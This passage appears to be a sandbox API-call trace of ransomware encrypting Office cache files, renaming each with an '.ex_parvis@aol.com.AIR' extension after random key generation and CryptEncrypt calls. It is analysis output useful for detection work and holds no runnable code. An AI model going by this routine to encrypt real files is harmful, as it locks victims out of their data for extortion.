	[0087.392] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0087.392] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0087.396] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0087.397] GetProcessHeap () returned 0x540000
	[0087.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0087.397] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=36233052) returned 1
	[0087.397] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x228df5c
	[0087.397] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0087.397] GetProcessHeap () returned 0x540000
	[0087.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0087.397] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0087.397] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0087.400] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0087.400] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0087.400] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x228df5c) returned 0x3c20020
	[0087.401] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x228df5c) returned 0x5eb0020
	[0087.402] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0087.403] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x228df5c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x228df5c, lpOverlapped=0x0) returned 1
	[0089.006] SetFilePointer (in: hFile=0x494, lDistanceToMove=-36233052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0089.006] WriteFile (in: hFile=0x494, lpBuffer=0x5eb0020*, nNumberOfBytesToWrite=0x228df5c, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5eb0020*, lpNumberOfBytesWritten=0x3a1f778*=0x228df5c, lpOverlapped=0x0) returned 1
	[0089.588] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3c20020 | out: hHeap=0x540000) returned 1
	[0089.741] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5eb0020 | out: hHeap=0x540000) returned 1
	[0089.893] CloseHandle (hObject=0x494) returned 1
	[0090.176] GetProcessHeap () returned 0x540000
	[0090.176] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0090.176] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0090.176] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0090.176] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbed8 | out: hHeap=0x540000) returned 1
	[0090.176] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbe30 | out: hHeap=0x540000) returned 1
	[0090.176] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbe30
	[0090.176] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0090.176] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0090.176] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0090.176] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0090.176] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll", dwFileAttributes=0x80) returned 1
	[0090.178] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 74
	[0090.178] GetProcessHeap () returned 0x540000
	[0090.178] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfa) returned 0x5b8568
	[0090.178] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll"
	[0090.178] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR"
	[0090.178] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0090.181] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0090.181] GetProcessHeap () returned 0x540000
	[0090.181] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0090.181] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=7378792) returned 1
	[0090.181] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x709768
	[0090.181] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0090.181] GetProcessHeap () returned 0x540000
	[0090.181] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0090.182] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0090.182] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0090.185] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0090.186] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0090.186] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x709768) returned 0x3c20020
	[0090.186] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x709768) returned 0x4330020
	[0090.187] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.187] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x709768, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x709768, lpOverlapped=0x0) returned 1
	[0090.497] SetFilePointer (in: hFile=0x494, lDistanceToMove=-7378792, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.497] WriteFile (in: hFile=0x494, lpBuffer=0x4330020*, nNumberOfBytesToWrite=0x709768, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x4330020*, lpNumberOfBytesWritten=0x3a1f778*=0x709768, lpOverlapped=0x0) returned 1
	[0090.602] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3c20020 | out: hHeap=0x540000) returned 1
	[0090.633] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x4330020 | out: hHeap=0x540000) returned 1
	[0090.664] CloseHandle (hObject=0x494) returned 1
	[0090.813] GetProcessHeap () returned 0x540000
	[0090.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0090.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0090.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0090.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbe30 | out: hHeap=0x540000) returned 1
	[0090.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbd88 | out: hHeap=0x540000) returned 1
	[0090.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x5fb4b8
	[0090.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0090.813] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0090.813] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0090.814] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0090.814] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", dwFileAttributes=0x80) returned 1
	[0090.818] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 71
	[0090.818] GetProcessHeap () returned 0x540000
	[0090.818] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf4) returned 0x5fb550
	[0090.818] lstrcpyW (in: lpString1=0x5fb550, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe"
	[0090.818] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0090.818] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0090.824] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0090.825] GetProcessHeap () returned 0x540000
	[0090.825] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb550 | out: hHeap=0x540000) returned 1
	[0090.825] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=174440) returned 1
	[0090.825] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2a968
	[0090.825] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0090.825] GetProcessHeap () returned 0x540000
	[0090.825] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0090.825] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0090.825] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0090.828] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0090.828] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0090.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2a968) returned 0x3790048
	[0090.829] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2a968) returned 0x37ba9b8
	[0090.830] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.830] ReadFile (in: hFile=0x494, lpBuffer=0x3790048, nNumberOfBytesToRead=0x2a968, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesRead=0x3a1f778*=0x2a968, lpOverlapped=0x0) returned 1
	[0090.836] SetFilePointer (in: hFile=0x494, lDistanceToMove=-174440, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.836] WriteFile (in: hFile=0x494, lpBuffer=0x37ba9b8*, nNumberOfBytesToWrite=0x2a968, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37ba9b8*, lpNumberOfBytesWritten=0x3a1f778*=0x2a968, lpOverlapped=0x0) returned 1
	[0090.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790048 | out: hHeap=0x540000) returned 1
	[0090.836] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x37ba9b8 | out: hHeap=0x540000) returned 1
	[0090.836] CloseHandle (hObject=0x494) returned 1
	[0090.838] GetProcessHeap () returned 0x540000
	[0090.838] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0090.838] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0090.839] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0090.839] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4b8 | out: hHeap=0x540000) returned 1
	[0090.839] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb420 | out: hHeap=0x540000) returned 1
	[0090.839] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbd88
	[0090.839] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0090.839] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0090.839] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0090.839] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0090.839] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1
	[0090.840] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 78
	[0090.840] GetProcessHeap () returned 0x540000
	[0090.840] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x5fb420
	[0090.840] lstrcpyW (in: lpString1=0x5fb420, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml"
	[0090.840] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0090.841] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0090.844] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0090.844] GetProcessHeap () returned 0x540000
	[0090.844] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb420 | out: hHeap=0x540000) returned 1
	[0090.844] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=4274) returned 1
	[0090.844] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10b2
	[0090.844] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0090.844] GetProcessHeap () returned 0x540000
	[0090.844] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0090.844] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0090.845] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0090.846] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0090.846] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0090.847] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10b2) returned 0x5fdb78
	[0090.847] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10b2) returned 0x5fec38
	[0090.847] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.847] ReadFile (in: hFile=0x494, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x10b2, lpOverlapped=0x0) returned 1
	[0090.848] SetFilePointer (in: hFile=0x494, lDistanceToMove=-4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.848] WriteFile (in: hFile=0x494, lpBuffer=0x5fec38*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fec38*, lpNumberOfBytesWritten=0x3a1f778*=0x10b2, lpOverlapped=0x0) returned 1
	[0090.848] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0090.848] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fec38 | out: hHeap=0x540000) returned 1
	[0090.848] CloseHandle (hObject=0x494) returned 1
	[0090.849] GetProcessHeap () returned 0x540000
	[0090.849] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0090.849] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0090.849] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0090.849] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbd88 | out: hHeap=0x540000) returned 1
	[0090.849] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbce0 | out: hHeap=0x540000) returned 1
	[0090.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbce0
	[0090.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0090.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0090.849] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0090.849] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0090.849] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi", dwFileAttributes=0x80) returned 1
	[0090.850] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 78
	[0090.850] GetProcessHeap () returned 0x540000
